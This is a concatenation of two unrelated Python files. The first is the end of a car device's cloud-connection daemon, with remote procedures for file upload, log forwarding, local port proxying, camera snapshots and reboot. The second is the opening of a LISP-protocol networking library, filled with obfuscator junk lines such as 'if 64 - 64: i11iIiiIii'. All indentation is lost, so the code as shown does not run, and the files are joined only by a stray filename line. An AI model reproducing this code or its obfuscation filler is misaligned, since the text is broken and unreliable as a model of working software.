log_recv_queue: Any = queue.Queue()
cancelled_uploads: Any = set()
UploadItem = namedtuple('UploadItem', ['path', 'url', 'headers', 'created_at', 'id', 'retry_count', 'current', 'progress'], defaults=(0, False, 0))
cur_upload_items = {}
def handle_long_poll(ws):
end_event = threading.Event()
threads = [
threading.Thread(target=ws_recv, args=(ws, end_event), name='ws_recv'),
threading.Thread(target=ws_send, args=(ws, end_event), name='ws_send'),
threading.Thread(target=upload_handler, args=(end_event,), name='upload_handler'),
threading.Thread(target=log_handler, args=(end_event,), name='log_handler'),
] + [
threading.Thread(target=jsonrpc_handler, args=(end_event,), name=f'worker_{x}')
for x in range(HANDLER_THREADS)
]
for thread in threads:
thread.start()
try:
while not end_event.is_set():
time.sleep(0.1)
except (KeyboardInterrupt, SystemExit):
end_event.set()
raise
finally:
for thread in threads:
cloudlog.debug(f"athena.joining {thread.name}")
thread.join()
def jsonrpc_handler(end_event):
dispatcher["startLocalProxy"] = partial(startLocalProxy, end_event)
while not end_event.is_set():
try:
data = recv_queue.get(timeout=1)
if "method" in data:
cloudlog.debug(f"athena.jsonrpc_handler.call_method {data}")
response = JSONRPCResponseManager.handle(data, dispatcher)
send_queue.put_nowait(response.json)
elif "id" in data and ("result" in data or "error" in data):
log_recv_queue.put_nowait(data)
else:
raise Exception("not a valid request or response")
except queue.Empty:
pass
except Exception as e:
cloudlog.exception("athena jsonrpc handler failed")
send_queue.put_nowait(json.dumps({"error": str(e)}))
def upload_handler(end_event):
tid = threading.get_ident()
while not end_event.is_set():
cur_upload_items[tid] = None
try:
cur_upload_items[tid] = upload_queue.get(timeout=1)._replace(current=True)
if cur_upload_items[tid].id in cancelled_uploads:
cancelled_uploads.remove(cur_upload_items[tid].id)
continue
try:
def cb(sz, cur):
cur_upload_items[tid] = cur_upload_items[tid]._replace(progress=cur / sz if sz else 1)
_do_upload(cur_upload_items[tid], cb)
except (requests.exceptions.Timeout, requests.exceptions.ConnectionError, requests.exceptions.SSLError) as e:
cloudlog.warning(f"athena.upload_handler.retry {e} {cur_upload_items[tid]}")
if cur_upload_items[tid].retry_count < MAX_RETRY_COUNT:
item = cur_upload_items[tid]
item = item._replace(
retry_count=item.retry_count + 1,
progress=0,
current=False
)
upload_queue.put_nowait(item)
cur_upload_items[tid] = None
for _ in range(RETRY_DELAY):
time.sleep(1)
if end_event.is_set():
break
except queue.Empty:
pass
except Exception:
cloudlog.exception("athena.upload_handler.exception")
def _do_upload(upload_item, callback=None):
with open(upload_item.path, "rb") as f:
size = os.fstat(f.fileno()).st_size
if callback:
f = CallbackReader(f, callback, size)
return requests.put(upload_item.url,
data=f,
headers={**upload_item.headers, 'Content-Length': str(size)},
timeout=30)
# security: user should be able to request any message from their car
@dispatcher.add_method
def getMessage(service=None, timeout=1000):
if service is None or service not in service_list:
raise Exception("invalid service")
socket = messaging.sub_sock(service, timeout=timeout)
ret = messaging.recv_one(socket)
if ret is None:
raise TimeoutError
return ret.to_dict()
@dispatcher.add_method
def getVersion():
return {
"version": get_version(),
"remote": get_origin(),
"branch": get_short_branch(),
"commit": get_commit(),
}
@dispatcher.add_method
def setNavDestination(latitude=0, longitude=0, place_name=None, place_details=None):
destination = {
"latitude": latitude,
"longitude": longitude,
"place_name": place_name,
"place_details": place_details,
}
Params().put("NavDestination", json.dumps(destination))
return {"success": 1}
def scan_dir(path, prefix):
files = list()
# only walk directories that match the prefix
# (glob and friends traverse entire dir tree)
with os.scandir(path) as i:
for e in i:
rel_path = os.path.relpath(e.path, ROOT)
if e.is_dir(follow_symlinks=False):
# add trailing slash
rel_path = os.path.join(rel_path, '')
# if prefix is a partial dir name, current dir will start with prefix
# if prefix is a partial file name, prefix with start with dir name
if rel_path.startswith(prefix) or prefix.startswith(rel_path):
files.extend(scan_dir(e.path, prefix))
else:
if rel_path.startswith(prefix):
files.append(rel_path)
return files
@dispatcher.add_method
def listDataDirectory(prefix=''):
return scan_dir(ROOT, prefix)
@dispatcher.add_method
def reboot():
sock = messaging.sub_sock("deviceState", timeout=1000)
ret = messaging.recv_one(sock)
if ret is None or ret.deviceState.started:
raise Exception("Reboot unavailable")
def do_reboot():
time.sleep(2)
HARDWARE.reboot()
threading.Thread(target=do_reboot).start()
return {"success": 1}
@dispatcher.add_method
def uploadFileToUrl(fn, url, headers):
if len(fn) == 0 or fn[0] == '/' or '..' in fn:
return 500
path = os.path.join(ROOT, fn)
if not os.path.exists(path):
return 404
item = UploadItem(path=path, url=url, headers=headers, created_at=int(time.time() * 1000), id=None)
upload_id = hashlib.sha1(str(item).encode()).hexdigest()
item = item._replace(id=upload_id)
upload_queue.put_nowait(item)
return {"enqueued": 1, "item": item._asdict()}
@dispatcher.add_method
def listUploadQueue():
items = list(upload_queue.queue) + list(cur_upload_items.values())
return [i._asdict() for i in items if (i is not None) and (i.id not in cancelled_uploads)]
@dispatcher.add_method
def cancelUpload(upload_id):
upload_ids = set(item.id for item in list(upload_queue.queue))
if upload_id not in upload_ids:
return 404
cancelled_uploads.add(upload_id)
return {"success": 1}
@dispatcher.add_method
def primeActivated(activated):
return {"success": 1}
def startLocalProxy(global_end_event, remote_ws_uri, local_port):
try:
if local_port not in LOCAL_PORT_WHITELIST:
raise Exception("Requested local port not whitelisted")
cloudlog.debug("athena.startLocalProxy.starting")
params = Params()
dongle_id = params.get("DongleId").decode('utf8')
identity_token = Api(dongle_id).get_token()
ws = create_connection(remote_ws_uri,
cookie="jwt=" + identity_token,
enable_multithread=True)
ssock, csock = socket.socketpair()
local_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
local_sock.connect(('127.0.0.1', local_port))
local_sock.setblocking(0)
proxy_end_event = threading.Event()
threads = [
threading.Thread(target=ws_proxy_recv, args=(ws, local_sock, ssock, proxy_end_event, global_end_event)),
threading.Thread(target=ws_proxy_send, args=(ws, local_sock, csock, proxy_end_event))
]
for thread in threads:
thread.start()
cloudlog.debug("athena.startLocalProxy.started")
return {"success": 1}
except Exception as e:
cloudlog.exception("athenad.startLocalProxy.exception")
raise e
@dispatcher.add_method
def getPublicKey():
if not os.path.isfile(PERSIST + '/comma/id_rsa.pub'):
return None
with open(PERSIST + '/comma/id_rsa.pub', 'r') as f:
return f.read()
@dispatcher.add_method
def getSshAuthorizedKeys():
return Params().get("GithubSshKeys", encoding='utf8') or ''
@dispatcher.add_method
def getSimInfo():
return HARDWARE.get_sim_info()
@dispatcher.add_method
def getNetworkType():
return HARDWARE.get_network_type()
@dispatcher.add_method
def getNetworks():
return HARDWARE.get_networks()
@dispatcher.add_method
def takeSnapshot():
from selfdrive.camerad.snapshot.snapshot import snapshot, jpeg_write
ret = snapshot()
if ret is not None:
def b64jpeg(x):
if x is not None:
f = io.BytesIO()
jpeg_write(f, x)
return base64.b64encode(f.getvalue()).decode("utf-8")
else:
return None
return {'jpegBack': b64jpeg(ret[0]),
'jpegFront': b64jpeg(ret[1])}
else:
raise Exception("not available while camerad is started")
def get_logs_to_send_sorted():
# TODO: scan once then use inotify to detect file creation/deletion
curr_time = int(time.time())
logs = []
for log_entry in os.listdir(SWAGLOG_DIR):
log_path = os.path.join(SWAGLOG_DIR, log_entry)
try:
time_sent = int.from_bytes(getxattr(log_path, LOG_ATTR_NAME), sys.byteorder)
except (ValueError, TypeError):
time_sent = 0
# assume send failed and we lost the response if sent more than one hour ago
if not time_sent or curr_time - time_sent > 3600:
logs.append(log_entry)
# excluding most recent (active) log file
return sorted(logs)[:-1]
def log_handler(end_event):
if PC:
return
log_files = []
last_scan = 0
while not end_event.is_set():
try:
curr_scan = sec_since_boot()
if curr_scan - last_scan > 10:
log_files = get_logs_to_send_sorted()
last_scan = curr_scan
# send one log
curr_log = None
if len(log_files) > 0:
log_entry = log_files.pop() # newest log file
cloudlog.debug(f"athena.log_handler.forward_request {log_entry}")
try:
curr_time = int(time.time())
log_path = os.path.join(SWAGLOG_DIR, log_entry)
setxattr(log_path, LOG_ATTR_NAME, int.to_bytes(curr_time, 4, sys.byteorder))
with open(log_path, "r") as f:
jsonrpc = {
"method": "forwardLogs",
"params": {
"logs": f.read()
},
"jsonrpc": "2.0",
"id": log_entry
}
log_send_queue.put_nowait(json.dumps(jsonrpc))
curr_log = log_entry
except OSError:
pass # file could be deleted by log rotation
# wait for response up to ~100 seconds
# always read queue at least once to process any old responses that arrive
for _ in range(100):
if end_event.is_set():
break
try:
log_resp = json.loads(log_recv_queue.get(timeout=1))
log_entry = log_resp.get("id")
log_success = "result" in log_resp and log_resp["result"].get("success")
cloudlog.debug(f"athena.log_handler.forward_response {log_entry} {log_success}")
if log_entry and log_success:
log_path = os.path.join(SWAGLOG_DIR, log_entry)
try:
setxattr(log_path, LOG_ATTR_NAME, LOG_ATTR_VALUE_MAX_UNIX_TIME)
except OSError:
pass # file could be deleted by log rotation
if curr_log == log_entry:
break
except queue.Empty:
if curr_log is None:
break
except Exception:
cloudlog.exception("athena.log_handler.exception")
def ws_proxy_recv(ws, local_sock, ssock, end_event, global_end_event):
while not (end_event.is_set() or global_end_event.is_set()):
try:
data = ws.recv()
local_sock.sendall(data)
except WebSocketTimeoutException:
pass
except Exception:
cloudlog.exception("athenad.ws_proxy_recv.exception")
break
cloudlog.debug("athena.ws_proxy_recv closing sockets")
ssock.close()
local_sock.close()
cloudlog.debug("athena.ws_proxy_recv done closing sockets")
end_event.set()
def ws_proxy_send(ws, local_sock, signal_sock, end_event):
while not end_event.is_set():
try:
r, _, _ = select.select((local_sock, signal_sock), (), ())
if r:
if r[0].fileno() == signal_sock.fileno():
# got end signal from ws_proxy_recv
end_event.set()
break
data = local_sock.recv(4096)
if not data:
# local_sock is dead
end_event.set()
break
ws.send(data, ABNF.OPCODE_BINARY)
except Exception:
cloudlog.exception("athenad.ws_proxy_send.exception")
end_event.set()
cloudlog.debug("athena.ws_proxy_send closing sockets")
signal_sock.close()
cloudlog.debug("athena.ws_proxy_send done closing sockets")
def ws_recv(ws, end_event):
last_ping = int(sec_since_boot() * 1e9)
while not end_event.is_set():
try:
opcode, data = ws.recv_data(control_frame=True)
if opcode in (ABNF.OPCODE_TEXT, ABNF.OPCODE_BINARY):
if opcode == ABNF.OPCODE_TEXT:
data = data.decode("utf-8")
recv_queue.put_nowait(data)
elif opcode == ABNF.OPCODE_PING:
last_ping = int(sec_since_boot() * 1e9)
Params().put("LastAthenaPingTime", str(last_ping))
except WebSocketTimeoutException:
ns_since_last_ping = int(sec_since_boot() * 1e9) - last_ping
if ns_since_last_ping > RECONNECT_TIMEOUT_S * 1e9:
cloudlog.exception("athenad.ws_recv.timeout")
end_event.set()
except Exception:
cloudlog.exception("athenad.ws_recv.exception")
end_event.set()
def ws_send(ws, end_event):
while not end_event.is_set():
try:
try:
data = send_queue.get_nowait()
except queue.Empty:
data = log_send_queue.get(timeout=1)
for i in range(0, len(data), WS_FRAME_SIZE):
frame = data[i:i+WS_FRAME_SIZE]
last = i + WS_FRAME_SIZE >= len(data)
opcode = ABNF.OPCODE_TEXT if i == 0 else ABNF.OPCODE_CONT
ws.send_frame(ABNF.create_frame(frame, opcode, last))
except queue.Empty:
pass
except Exception:
cloudlog.exception("athenad.ws_send.exception")
end_event.set()
def backoff(retries):
return random.randrange(0, min(128, int(2 ** retries)))
def main():
params = Params()
dongle_id = params.get("DongleId", encoding='utf-8')
ws_uri = ATHENA_HOST + "/ws/v2/" + dongle_id
api = Api(dongle_id)
conn_retries = 0
while 1:
try:
cloudlog.event("athenad.main.connecting_ws", ws_uri=ws_uri)
ws = create_connection(ws_uri,
cookie="jwt=" + api.get_token(),
enable_multithread=True,
timeout=30.0)
cloudlog.event("athenad.main.connected_ws", ws_uri=ws_uri)
params.delete("PrimeRedirected")
conn_retries = 0
cur_upload_items.clear()
handle_long_poll(ws)
except (KeyboardInterrupt, SystemExit):
break
except (ConnectionError, TimeoutError, WebSocketException):
conn_retries += 1
params.delete("PrimeRedirected")
params.delete("LastAthenaPingTime")
except socket.timeout:
try:
r = requests.get("http://api.commadotai.com/v1/me", allow_redirects=False,
headers={"User-Agent": f"openpilot-{get_version()}"}, timeout=15.0)
if r.status_code == 302 and r.headers['Location'].startswith("http://u.web2go.com"):
params.put_bool("PrimeRedirected", True)
except Exception:
cloudlog.exception("athenad.socket_timeout.exception")
params.delete("LastAthenaPingTime")
except Exception:
cloudlog.exception("athenad.main.exception")
conn_retries += 1
params.delete("PrimeRedirected")
params.delete("LastAthenaPingTime")
time.sleep(backoff(conn_retries))
if __name__ == "__main__":
main()
|
lisp.py
|
# -----------------------------------------------------------------------------
#
# Copyright 2013-2019 lispers.net - Dino Farinacci <farinacci@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -----------------------------------------------------------------------------
#
# lisp.py
#
# This file contains all constants, definitions, data structures, packet
# send and receive functions for the LISP protocol according to RFC 6830.
#
#------------------------------------------------------------------------------
from __future__ import print_function
from __future__ import division
from future import standard_library
standard_library . install_aliases ( )
from builtins import hex
from builtins import str
from builtins import int
from builtins import range
from builtins import object
from past . utils import old_div
import socket
import time
import struct
import binascii
import hmac
import hashlib
import datetime
import os
import sys
import random
import threading
import operator
import netifaces
import platform
import traceback
from Crypto . Cipher import AES
import ecdsa
import json
import copy
import chacha
import poly1305
import geopy
import curve25519
from subprocess import getoutput
import queue
import distro
import pprint
if 64 - 64: i11iIiiIii
if 65 - 65: O0 / iIii1I11I1II1 % OoooooooOO - i1IIi
if 73 - 73: II111iiii
if 22 - 22: I1IiiI * Oo0Ooo / OoO0O00 . OoOoOO00 . o0oOOo0O0Ooo / I1ii11iIi11i
lisp_print_rloc_probe_list = False
if 48 - 48: oO0o / OOooOOo / I11i / Ii1I
if 48 - 48: iII111i % IiII + I1Ii111 / ooOoO0o * Ii1I
if 46 - 46: ooOoO0o * I11i - OoooooooOO
if 30 - 30: o0oOOo0O0Ooo - O0 % o0oOOo0O0Ooo - OoooooooOO * O0 * OoooooooOO
if 60 - 60: iIii1I11I1II1 / i1IIi * oO0o - I1ii11iIi11i + o0oOOo0O0Ooo
if 94 - 94: i1IIi % Oo0Ooo
lisp_hostname = ""
lisp_version = ""
lisp_uptime = ""
lisp_i_am_core = False
lisp_i_am_itr = False
lisp_i_am_etr = False
lisp_i_am_rtr = False
lisp_i_am_mr = False
lisp_i_am_ms = False
lisp_i_am_ddt = False
lisp_log_id = ""
lisp_debug_logging = True
if 68 - 68: Ii1I / O0
lisp_map_notify_queue = { }
lisp_map_servers_list = { }
lisp_ddt_map_requestQ = { }
lisp_db_list = [ ]
lisp_group_mapping_list = { }
lisp_map_resolvers_list = { }
lisp_rtr_list = { }
lisp_elp_list = { }
lisp_rle_list = { }
lisp_geo_list = { }
lisp_json_list = { }
lisp_myrlocs = [ None , None , None ]
lisp_mymacs = { }
if 46 - 46: O0 * II111iiii / IiII * Oo0Ooo * iII111i . I11i
if 62 - 62: i11iIiiIii - II111iiii % I1Ii111 - iIii1I11I1II1 . I1ii11iIi11i . II111iiii
if 61 - 61: oO0o / OoOoOO00 / iII111i * OoO0O00 . II111iiii
if 1 - 1: II111iiii - I1ii11iIi11i % i11iIiiIii + IiII . I1Ii111
if 55 - 55: iIii1I11I1II1 - I1IiiI . Ii1I * IiII * i1IIi / iIii1I11I1II1
lisp_myinterfaces = { }
lisp_iid_to_interface = { }
lisp_multi_tenant_interfaces = [ ]
if 79 - 79: oO0o + I1Ii111 . ooOoO0o * IiII % I11i . I1IiiI
lisp_test_mr_timer = None
lisp_rloc_probe_timer = None
if 94 - 94: iII111i * Ii1I / IiII . i1IIi * iII111i
if 47 - 47: i1IIi % i11iIiiIii
if 20 - 20: ooOoO0o * II111iiii
if 65 - 65: o0oOOo0O0Ooo * iIii1I11I1II1 * ooOoO0o
lisp_registered_count = 0
if 18 - 18: iIii1I11I1II1 / I11i + oO0o / Oo0Ooo - II111iiii - I11i
if 1 - 1: I11i - OOooOOo % O0 + I1IiiI - iII111i / I11i
if 31 - 31: OoO0O00 + II111iiii
if 13 - 13: OOooOOo * oO0o * I1IiiI
lisp_info_sources_by_address = { }
lisp_info_sources_by_nonce = { }
if 55 - 55: II111iiii
if 43 - 43: OoOoOO00 - i1IIi + I1Ii111 + Ii1I
if 17 - 17: o0oOOo0O0Ooo
if 64 - 64: Ii1I % i1IIi % OoooooooOO
if 3 - 3: iII111i + O0
if 42 - 42: OOooOOo / i1IIi + i11iIiiIii - Ii1I
lisp_crypto_keys_by_nonce = { }
lisp_crypto_keys_by_rloc_encap = { }
lisp_crypto_keys_by_rloc_decap = { }
lisp_data_plane_security = False
lisp_search_decap_keys = True
if 78 - 78: OoO0O00
lisp_data_plane_logging = False
lisp_frame_logging = False
lisp_flow_logging = False
if 18 - 18: O0 - iII111i / iII111i + ooOoO0o % ooOoO0o - IiII
if 62 - 62: iII111i - IiII - OoOoOO00 % i1IIi / oO0o
if 77 - 77: II111iiii - II111iiii . I1IiiI / o0oOOo0O0Ooo
if 14 - 14: I11i % O0
if 41 - 41: i1IIi + I1Ii111 + OOooOOo - IiII
if 77 - 77: Oo0Ooo . IiII % ooOoO0o
if 42 - 42: oO0o - i1IIi / i11iIiiIii + OOooOOo + OoO0O00
lisp_crypto_ephem_port = None
if 17 - 17: oO0o . Oo0Ooo . I1ii11iIi11i
if 3 - 3: OoOoOO00 . Oo0Ooo . I1IiiI / Ii1I
if 38 - 38: II111iiii % i11iIiiIii . ooOoO0o - OOooOOo + Ii1I
if 66 - 66: OoooooooOO * OoooooooOO . OOooOOo . i1IIi - OOooOOo
lisp_pitr = False
if 77 - 77: I11i - iIii1I11I1II1
if 82 - 82: i11iIiiIii . OOooOOo / Oo0Ooo * O0 % oO0o % iIii1I11I1II1
if 78 - 78: iIii1I11I1II1 - Ii1I * OoO0O00 + o0oOOo0O0Ooo + iII111i + iII111i
if 11 - 11: iII111i - OoO0O00 % ooOoO0o % iII111i / OoOoOO00 - OoO0O00
lisp_l2_overlay = False
if 74 - 74: iII111i * O0
if 89 - 89: oO0o + Oo0Ooo
if 3 - 3: i1IIi / I1IiiI % I11i * i11iIiiIii / O0 * I11i
if 49 - 49: oO0o % Ii1I + i1IIi . I1IiiI % I1ii11iIi11i
if 48 - 48: I11i + I11i / II111iiii / iIii1I11I1II1
lisp_rloc_probing = False
lisp_rloc_probe_list = { }
if 20 - 20: o0oOOo0O0Ooo
if 77 - 77: OoOoOO00 / I11i
if 98 - 98: iIii1I11I1II1 / i1IIi / i11iIiiIii / o0oOOo0O0Ooo
if 28 - 28: OOooOOo - IiII . IiII + OoOoOO00 - OoooooooOO + O0
if 95 - 95: OoO0O00 % oO0o . O0
if 15 - 15: ooOoO0o / Ii1I . Ii1I - i1IIi
lisp_register_all_rtrs = True
if 53 - 53: IiII + I1IiiI * oO0o
if 61 - 61: i1IIi * OOooOOo / OoooooooOO . i11iIiiIii . OoOoOO00
if 60 - 60: I11i / I11i
if 46 - 46: Ii1I * OOooOOo - OoO0O00 * oO0o - I1Ii111
lisp_nonce_echoing = False
lisp_nonce_echo_list = { }
if 83 - 83: OoooooooOO
if 31 - 31: II111iiii - OOooOOo . I1Ii111 % OoOoOO00 - O0
if 4 - 4: II111iiii / ooOoO0o . iII111i
if 58 - 58: OOooOOo * i11iIiiIii / OoOoOO00 % I1Ii111 - I1ii11iIi11i / oO0o
lisp_nat_traversal = False
if 50 - 50: I1IiiI
if 34 - 34: I1IiiI * II111iiii % iII111i * OoOoOO00 - I1IiiI
if 33 - 33: o0oOOo0O0Ooo + OOooOOo * OoO0O00 - Oo0Ooo / oO0o % Ii1I
if 21 - 21: OoO0O00 * iIii1I11I1II1 % oO0o * i1IIi
if 16 - 16: O0 - I1Ii111 * iIii1I11I1II1 + iII111i
if 50 - 50: II111iiii - ooOoO0o * I1ii11iIi11i / I1Ii111 + o0oOOo0O0Ooo
if 88 - 88: Ii1I / I1Ii111 + iII111i - II111iiii / ooOoO0o - OoOoOO00
if 15 - 15: I1ii11iIi11i + OoOoOO00 - OoooooooOO / OOooOOo
lisp_program_hardware = False
if 58 - 58: i11iIiiIii % I11i
if 71 - 71: OOooOOo + ooOoO0o % i11iIiiIii + I1ii11iIi11i - IiII
if 88 - 88: OoOoOO00 - OoO0O00 % OOooOOo
if 16 - 16: I1IiiI * oO0o % IiII
lisp_checkpoint_map_cache = False
lisp_checkpoint_filename = "./lisp.checkpoint"
if 86 - 86: I1IiiI + Ii1I % i11iIiiIii * oO0o . ooOoO0o * I11i
if 44 - 44: oO0o
if 88 - 88: I1Ii111 % Ii1I . II111iiii
if 38 - 38: o0oOOo0O0Ooo
lisp_ipc_data_plane = False
lisp_ipc_dp_socket = None
lisp_ipc_dp_socket_name = "lisp-ipc-data-plane"
if 57 - 57: O0 / oO0o * I1Ii111 / OoOoOO00 . II111iiii
if 26 - 26: iII111i
if 91 - 91: OoO0O00 . I1ii11iIi11i + OoO0O00 - iII111i / OoooooooOO
if 39 - 39: I1ii11iIi11i / ooOoO0o - II111iiii
if 98 - 98: I1ii11iIi11i / I11i % oO0o . OoOoOO00
lisp_ipc_lock = None
if 91 - 91: oO0o % Oo0Ooo
if 64 - 64: I11i % iII111i - I1Ii111 - oO0o
if 31 - 31: I11i - II111iiii . I11i
if 18 - 18: o0oOOo0O0Ooo
if 98 - 98: iII111i * iII111i / iII111i + I11i
if 34 - 34: ooOoO0o
lisp_default_iid = 0
lisp_default_secondary_iid = 0
if 15 - 15: I11i * ooOoO0o * Oo0Ooo % i11iIiiIii % OoOoOO00 - OOooOOo
if 68 - 68: I1Ii111 % i1IIi . IiII . I1ii11iIi11i
if 92 - 92: iII111i . I1Ii111
if 31 - 31: I1Ii111 . OoOoOO00 / O0
if 89 - 89: OoOoOO00
lisp_ms_rtr_list = [ ]
if 68 - 68: OoO0O00 * OoooooooOO % O0 + OoO0O00 + ooOoO0o
if 4 - 4: ooOoO0o + O0 * OOooOOo
if 55 - 55: Oo0Ooo + iIii1I11I1II1 / OoOoOO00 * oO0o - i11iIiiIii - Ii1I
if 25 - 25: I1ii11iIi11i
if 7 - 7: i1IIi / I1IiiI * I1Ii111 . IiII . iIii1I11I1II1
if 13 - 13: OOooOOo / i11iIiiIii
lisp_nat_state_info = { }
if 2 - 2: I1IiiI / O0 / o0oOOo0O0Ooo % OoOoOO00 % Ii1I
if 52 - 52: o0oOOo0O0Ooo
if 95 - 95: Ii1I
if 87 - 87: ooOoO0o + OoOoOO00 . OOooOOo + OoOoOO00
if 91 - 91: O0
if 61 - 61: II111iiii
lisp_last_map_request_sent = None
lisp_no_map_request_rate_limit = time . time ( )
if 64 - 64: ooOoO0o / OoOoOO00 - O0 - I11i
if 86 - 86: I11i % OoOoOO00 / I1IiiI / OoOoOO00
if 42 - 42: OoO0O00
if 67 - 67: I1Ii111 . iII111i . O0
lisp_last_icmp_too_big_sent = 0
if 10 - 10: I1ii11iIi11i % I1ii11iIi11i - iIii1I11I1II1 / OOooOOo + Ii1I
if 87 - 87: oO0o * I1ii11iIi11i + OOooOOo / iIii1I11I1II1 / iII111i
if 37 - 37: iII111i - ooOoO0o * oO0o % i11iIiiIii - I1Ii111
if 83 - 83: I11i / I1IiiI
LISP_FLOW_LOG_SIZE = 100
lisp_flow_log = [ ]
if 34 - 34: IiII
if 57 - 57: oO0o . I11i . i1IIi
if 42 - 42: I11i + I1ii11iIi11i % O0
if 6 - 6: oO0o
lisp_policies = { }
if 68 - 68: OoOoOO00 - OoO0O00
if 28 - 28: OoO0O00 . OOooOOo / OOooOOo + Oo0Ooo . I1ii11iIi11i
if 1 - 1: iIii1I11I1II1 / II111iiii
if 33 - 33: I11i
if 18 - 18: o0oOOo0O0Ooo % iII111i * O0
lisp_load_split_pings = False
if 87 - 87: i11iIiiIii
if 93 - 93: I1ii11iIi11i - OoO0O00 % i11iIiiIii . iII111i / iII111i - I1Ii111
if 9 - 9: I1ii11iIi11i / Oo0Ooo - I1IiiI / OoooooooOO / iIii1I11I1II1 - o0oOOo0O0Ooo
if 91 - 91: iII111i % i1IIi % iIii1I11I1II1
if 20 - 20: OOooOOo % Ii1I / Ii1I + Ii1I
if 45 - 45: oO0o - IiII - OoooooooOO - OoO0O00 . II111iiii / O0
lisp_eid_hashes = [ ]
if 51 - 51: O0 + iII111i
if 8 - 8: oO0o * OoOoOO00 - Ii1I - OoO0O00 * OOooOOo % I1IiiI
if 48 - 48: O0
if 11 - 11: I11i + OoooooooOO - OoO0O00 / o0oOOo0O0Ooo + Oo0Ooo . II111iiii
if 41 - 41: Ii1I - O0 - O0
if 68 - 68: OOooOOo % I1Ii111
if 88 - 88: iIii1I11I1II1 - ooOoO0o + OOooOOo
if 40 - 40: I1IiiI * Ii1I + OOooOOo % iII111i
lisp_reassembly_queue = { }
if 74 - 74: oO0o - Oo0Ooo + OoooooooOO + I1Ii111 / OoOoOO00
if 23 - 23: O0
if 85 - 85: Ii1I
if 84 - 84: I1IiiI . iIii1I11I1II1 % OoooooooOO + Ii1I % OoooooooOO % OoO0O00
if 42 - 42: OoO0O00 / I11i / o0oOOo0O0Ooo + iII111i / OoOoOO00
if 84 - 84: ooOoO0o * II111iiii + Oo0Ooo
if 53 - 53: iII111i % II111iiii . IiII - iIii1I11I1II1 - IiII * II111iiii
lisp_pubsub_cache = { }
if 77 - 77: iIii1I11I1II1 * OoO0O00
if 95 - 95: I1IiiI + i11iIiiIii
if 6 - 6: ooOoO0o / i11iIiiIii + iII111i * oO0o
if 80 - 80: II111iiii
if 83 - 83: I11i . i11iIiiIii + II111iiii . o0oOOo0O0Ooo * I11i
if 53 - 53: II111iiii
lisp_decent_push_configured = False
if 31 - 31: OoO0O00
if 80 - 80: I1Ii111 . i11iIiiIii - o0oOOo0O0Ooo
if 25 - 25: OoO0O00
if 62 - 62: OOooOOo + O0
if 98 - 98: o0oOOo0O0Ooo
if 51 - 51: Oo0Ooo - oO0o + II111iiii * Ii1I . I11i + oO0o
lisp_decent_modulus = 0
lisp_decent_dns_suffix = None
if 78 - 78: i11iIiiIii / iII111i - Ii1I / OOooOOo + oO0o
if 82 - 82: Ii1I
if 46 - 46: OoooooooOO . i11iIiiIii
if 94 - 94: o0oOOo0O0Ooo * Ii1I / Oo0Ooo / Ii1I
if 87 - 87: Oo0Ooo . IiII
if 75 - 75: ooOoO0o + OoOoOO00 + o0oOOo0O0Ooo * I11i % oO0o . iII111i
lisp_ipc_socket = None
if 55 - 55: OOooOOo . I1IiiI
if 61 - 61: Oo0Ooo % IiII . Oo0Ooo
if 100 - 100: I1Ii111 * O0
if 64 - 64: OOooOOo % iIii1I11I1II1 * oO0o
lisp_ms_encryption_keys = { }
lisp_ms_json_keys = { }
if 79 - 79: O0
if 78 - 78: I1ii11iIi11i + OOooOOo - I1Ii111
if 38 - 38: o0oOOo0O0Ooo - oO0o + iIii1I11I1II1 / OoOoOO00 % Oo0Ooo
if 57 - 57: OoO0O00 / ooOoO0o
if 29 - 29: iIii1I11I1II1 + OoOoOO00 * OoO0O00 * OOooOOo . I1IiiI * I1IiiI
if 7 - 7: IiII * I1Ii111 % Ii1I - o0oOOo0O0Ooo
if 13 - 13: Ii1I . i11iIiiIii
if 56 - 56: I1ii11iIi11i % O0 - I1IiiI
if 100 - 100: Ii1I - O0 % oO0o * OOooOOo + I1IiiI
if 88 - 88: OoooooooOO - OoO0O00 * O0 * OoooooooOO . OoooooooOO
if 33 - 33: I1Ii111 + iII111i * oO0o / iIii1I11I1II1 - I1IiiI
if 54 - 54: I1Ii111 / OOooOOo . oO0o % iII111i
if 57 - 57: i11iIiiIii . I1ii11iIi11i - Ii1I - oO0o + OoOoOO00
if 63 - 63: OoOoOO00 * iII111i
lisp_rtr_nat_trace_cache = { }
if 69 - 69: O0 . OoO0O00
if 49 - 49: I1IiiI - I11i
if 74 - 74: iIii1I11I1II1 * I1ii11iIi11i + OoOoOO00 / i1IIi / II111iiii . Oo0Ooo
if 62 - 62: OoooooooOO * I1IiiI
if 58 - 58: OoOoOO00 % o0oOOo0O0Ooo
if 50 - 50: I1Ii111 . o0oOOo0O0Ooo
if 97 - 97: O0 + OoOoOO00
if 89 - 89: o0oOOo0O0Ooo + OoO0O00 * I11i * Ii1I
if 37 - 37: OoooooooOO - O0 - o0oOOo0O0Ooo
if 77 - 77: OOooOOo * iIii1I11I1II1
lisp_glean_mappings = [ ]
if 98 - 98: I1IiiI % Ii1I * OoooooooOO
if 51 - 51: iIii1I11I1II1 . OoOoOO00 / oO0o + o0oOOo0O0Ooo
if 33 - 33: ooOoO0o . II111iiii % iII111i + o0oOOo0O0Ooo
if 71 - 71: Oo0Ooo % OOooOOo
if 98 - 98: I11i % i11iIiiIii % ooOoO0o + Ii1I
if 78 - 78: I1ii11iIi11i % oO0o / iII111i - iIii1I11I1II1
if 69 - 69: I1Ii111
if 11 - 11: I1IiiI
if 16 - 16: Ii1I + IiII * O0 % i1IIi . I1IiiI
if 67 - 67: OoooooooOO / I1IiiI * Ii1I + I11i
if 65 - 65: OoooooooOO - I1ii11iIi11i / ooOoO0o / II111iiii / i1IIi
if 71 - 71: I1Ii111 + Ii1I
if 28 - 28: OOooOOo
if 38 - 38: ooOoO0o % II111iiii % I11i / OoO0O00 + OoOoOO00 / i1IIi
if 54 - 54: iIii1I11I1II1 % I1ii11iIi11i - OOooOOo / oO0o - OoO0O00 . I11i
if 11 - 11: I1ii11iIi11i . OoO0O00 * IiII * OoooooooOO + ooOoO0o
